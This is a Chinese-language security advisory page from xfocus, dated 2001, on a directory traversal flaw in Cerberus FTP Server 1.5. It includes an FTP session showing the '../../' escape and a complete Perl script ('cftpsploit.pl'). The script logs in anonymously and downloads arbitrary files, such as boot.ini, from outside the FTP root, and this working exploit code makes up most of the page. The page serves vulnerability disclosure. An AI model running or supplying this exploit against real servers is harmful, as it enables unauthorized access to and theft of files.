xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

Cerberus FTP 服务程序存在目录遍历漏洞


发布时间:2001-08-22
更新时间:2001-08-22
严重程度:
威胁程度:远程非授权文件存取
错误类型:输入验证错误
利用方式:服务器模式

受影响系统
Cerberus FTP Server version 1.5
详细描述
Cerberus FTP(http://www.greenepa.net/~averett/cerberus.htm)服务
程序是基于WINDOWS下的多线程FTP服务程序,使用较少的CPU和内存,
其中存在安全漏洞可以导致攻击者绕过FTP ROOT目录的限制。

测试代码
220-Welcome to Cerberus FTP Server
220 Created by Grant Averett
Benutzer (192.168.0.2:(none)): anonymous
230 User anonymous logged in
ftp> ls
200 Port command received
150 Opening data connection
delphiown
226 Transfer complete
FTP: 11 Bytes empfangen in 0,00Sekunden 11000,00KB/s
ftp> cd delphiown/../../
250 Change directory ok
ftp> ls
200 Port command received
150 Opening data connection

#!usr/bin/perl

# this exploit will download files from
# the ftp server, even if they are outside of
# root directory.

use Net::FTP;

$loginname='anonymous';
$passwd='';

$dirname= '';

print "\n-----------------------------------\n";
print "Cerberus Ftp server 1.5\n";
print "directory traversal exploit\n";
print "by Christoph Heindl\n";
print "se00020\@fhs-hagenberg.ac.at\n";
print "-----------------------------------\n";
if (!$ARGV[0] || !$ARGV[1]){
print "usage: cftpsploit.pl <host> <dir/file>\n";
print " example: cftpsploit.pl 192.168.0.2 boot.ini\n";
print " will download boot.ini from c:\ if server is running on drive
c\n";
exit;
}

$ipaddr=$ARGV[0];
$ftp=Net::FTP->new($ipaddr, Timeout=>5);
if (!$ftp->login($loginname, $passwd)){
die "\ncould not login\n";
}

print "searching for directory...";
foreach $dir ($ftp->ls()) {
next unless ($ftp->cwd($dir));
$dirname=$dir;
$ftp->cwd('..');
}
if ($dirname eq '') {
print "failed\n";
print "trying to create pseudo dir...";
$mkd=$ftp->mkdir('pseudo');
if ($mkd) {
  print "ok\n";
  $dirname="pseudo";
}
else {
  print "failed\n";
  print "exiting...\n";
  exit(0);
}
}
print "found dir\n";
print "dirname is: ".$dirname."\n";
$pathtofile=$dirname."/../../";
print "getting file...\n";
$ftp->get($pathtofile.$ARGV[1]);
$ftp->quit;
print "all done. file located in current dir";

解决方案
尚无

相关信息
Christoph.Heindl at fhs-hagenberg.ac.at